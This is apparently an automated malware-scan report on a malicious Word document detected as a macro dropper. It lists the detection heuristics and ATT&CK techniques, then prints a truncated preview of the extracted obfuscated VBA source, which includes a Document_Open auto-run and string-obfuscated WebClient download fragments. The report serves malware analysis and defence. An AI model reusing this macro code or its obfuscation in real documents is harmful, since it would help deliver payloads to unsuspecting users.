MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample is a malicious Office document containing a Document_Open VBA macro. This macro utilizes obfuscated code and a Shell() call, indicating an attempt to download and execute a secondary payload. The embedded URL is suspicious and likely points to the distribution point for this payload. The ClamAV detection further confirms its malicious nature.
Heuristics 5
-
ClamAV: Doc.Dropper.Agent-6517473-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6517473-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://eventFel+FeljubileeFel+Fel.com/SzFel+Felt6Fel+FeltZ/@Fel+Felh In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 37979 bytes |
SHA-256: 63ca706bf0cae13647dc43ad57753917381a7c98ade43676eaf24099e5a63563 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ksMhXPWSOu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub hvXDs(jZoZiP)
oBcqj = 11982 * aDzNrf + 55942 * ChrB(96930 * Rnd(99356) - 20736 + ojqfmz) - 22981 - Rnd(miUnWm) + 73287 - mKNIz * 58173 * Chr(aiwJM)
End Sub
Sub Ciadh(fTJPci)
TwFPc = 51840 * KqomC + 86304 * ChrB(20058 * Rnd(29642) - 29770 + qqzQj) - 536 - Rnd(KptGBd) + 90457 - dzKWVO * 36813 * Chr(GCMtob)
jQDIYm = 59869 * kzLFnh + 98111 * ChrB(17532 * Rnd(25131) - 87118 + YvAtu) - 73566 - Rnd(HtOWG) + 12112 - AJqzUW * 96561 * Chr(LZYJJf)
HtzAm = 5799 * jWJWBi + 72683 * ChrB(44860 * Rnd(26141) - 83379 + WnYIL) - 85124 - Rnd(DZjaU) + 71154 - rGlUXF * 37974 * Chr(IaTowU)
End Sub
Sub MoMhE(scziHd)
dIJCYt = 19687 * zCqll + 80463 * ChrB(59406 * Rnd(96209) - 78250 + tDkMv) - 26618 - Rnd(jpzimm) + 31117 - kCzRRP * 9855 * Chr(vMlWv)
zNiKK = 25945 * zQMvOr + 7617 * ChrB(20457 * Rnd(87747) - 25148 + aIBnf) - 63371 - Rnd(Hotoz) + 19388 - rOrmAc * 52971 * Chr(CllmV)
End Sub
Private Sub Document_open()
On Error Resume Next
YBzBz = 40092 * nRKizn + 6165 * ChrB(47857 * Rnd(63848) - 20113 + CDXdM) - 46669 - Rnd(kpXGPB) + 85549 - Ujntn * 99579 * Chr(vEwhEC)
znFMSjiH (YdVaUj + hFOAjKA + fupbI)
fYjBJ = 79895 * STlnXR + 26280 * ChrB(15412 * Rnd(35173) - 63267 + TrvQtl) - 78586 - Rnd(ItpowS) + 59830 - JWYuYO * 31454 * Chr(EshDD)
End Sub
Sub KNNKH(UOfvN)
jtdfnU = 85029 * ElumGF + 51313 * ChrB(46513 * Rnd(23803) - 2238 + lcmjb) - 50688 - Rnd(LOQurc) + 64375 - hXtYFN * 21745 * Chr(RYTbE)
qvCir = 53338 * uJBFzI + 57867 * ChrB(31569 * Rnd(18603) - 87594 + EKXDi) - 76139 - Rnd(qaGUKI) + 97507 - JXUrNk * 11044 * Chr(nNsTFE)
GIfBWt = 59126 * RPiBBt + 49687 * ChrB(99694 * Rnd(85318) - 12587 + zGvRj) - 62737 - Rnd(PjqlUq) + 73304 - AMiHbq * 59564 * Chr(CcfjEB)
End Sub
Sub NAMqE(KqzVXi)
wfusPI = 87661 * VliZU + 41070 * ChrB(86351 * Rnd(78652) - 1302 + vNVclH) - 99903 - Rnd(RpVfmE) + 22965 - oXhnTv * 16047 * Chr(sPiQk)
End Sub
Sub RBwXc(ZUuns)
qDrpza = 26577 * hVGNdz + 9657 * ChrB(42043 * Rnd(69770) - 42784 + jwMYU) - 63037 - Rnd(bvKUc) + 88484 - lEEICQ * 15435 * Chr(AYvul)
cLDjYP = 16477 * ifXIkw + 35888 * ChrB(49174 * Rnd(25447) - 87301 + SsvAN) - 64413 - Rnd(Qhwnc) + 48849 - UzjHkE * 59223 * Chr(zZYktf)
End Sub
Attribute VB_Name = "jaLChSBj"
Sub pCSwb(qDwNPz)
Sdpijt = 42760 * dnaHzV + 55386 * ChrB(50836 * Rnd(84081) - 55579 + SYRhm) - 62003 - Rnd(JiVlj) + 30039 - AIiMz * 74255 * Chr(KjMOr)
End Sub
Function hFOAjKA()
On Error Resume Next
KSVijC = 4552 * GjYEw + 14072 * ChrB(54340 * Rnd(61853) - 30954 + cTENQL) - 26101 - Rnd(tbhQJi) + 19358 - hbITKp * 6525 * Chr(zMrnW)
OfDwu = CjjjC("YFel+FelNSFel+FelB =Fel+Fel pDQnsF'+'el+FelaFel+FeldaFel+FelsdFel+Felv6WPW2", LGAUzh - LGAUzh + 2 + LGAUzh - LGAUzh, LGAUzh - LGAUzh + 68 + LGAUzh - LGAUzh)
cwfinB = 62245 * CJQvIb + 75850 * ChrB(81156 * Rnd(43547) - 80246 + TZAXwU) - 75139 - Rnd(pQDTa) + 28718 - wilfv * 16439 * Chr(kZwCPj)
zPSkz = 33389 * WQnrHQ + 20513 * ChrB(53157 * Rnd(66617) - 5449 + GPRBY) - 56241 - Rnd(rjDPPu) + 49119 - cHqLc * 3018 * Chr(EidKkO)
ZGiiivOooN = CjjjC("iNwdkSFel+Fel1Fel+Fel+2LFel+Fel1U,z", bGpBsC - bGpBsC + 7 + bGpBsC - bGpBsC, bGpBsC - bGpBsC + 26 + bGpBsC - bGpBsC)
NjkXi = 82476 * EwrpCH + 64994 * ChrB(60082 * Rnd(12459) - 2959 + RGoDkX) - 50983 - Rnd(WKiYN) + 85591 - XVWir * 22991 * Chr(PXJzWZ)
jVDPK = 28228 * LRdUHf + 22420 * ChrB(81239 * Rnd(87883) - 56258 + PEzKNw) - 75111 - Rnd(pCQRp) + 67442 - ABONzG * 92705 * Chr(lVWVHz)
YMCHtv = CjjjC("2z.TCFeqIz%l", CZbbRS - CZbbRS + 5 + CZbbRS - CZbbRS, CZbbRS - CZbbRS + 3 + CZbbRS - CZbbRS)
jfOGS = 12604 * YHEbE + 48640 * ChrB(47575 * Rnd(90109) - 108 + lRfKcf) - 56368 - Rnd(TSLpqd) + 60887 - TVkCi * 32403 * Chr(jdGJXB)
jodhfu = 79203 * hciYih + 15289 * ChrB(72103 * Rnd(70038) - 31014 + mfhzV) - 2312 - Rnd(XHslO) + 36798 - qDoCwX * 77744 * Chr(TbGXfR)
OGjiwA = CjjjC("Tb SyFel+Felstem.NFel+Felet.Fel+FelWebFel+Fels4
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.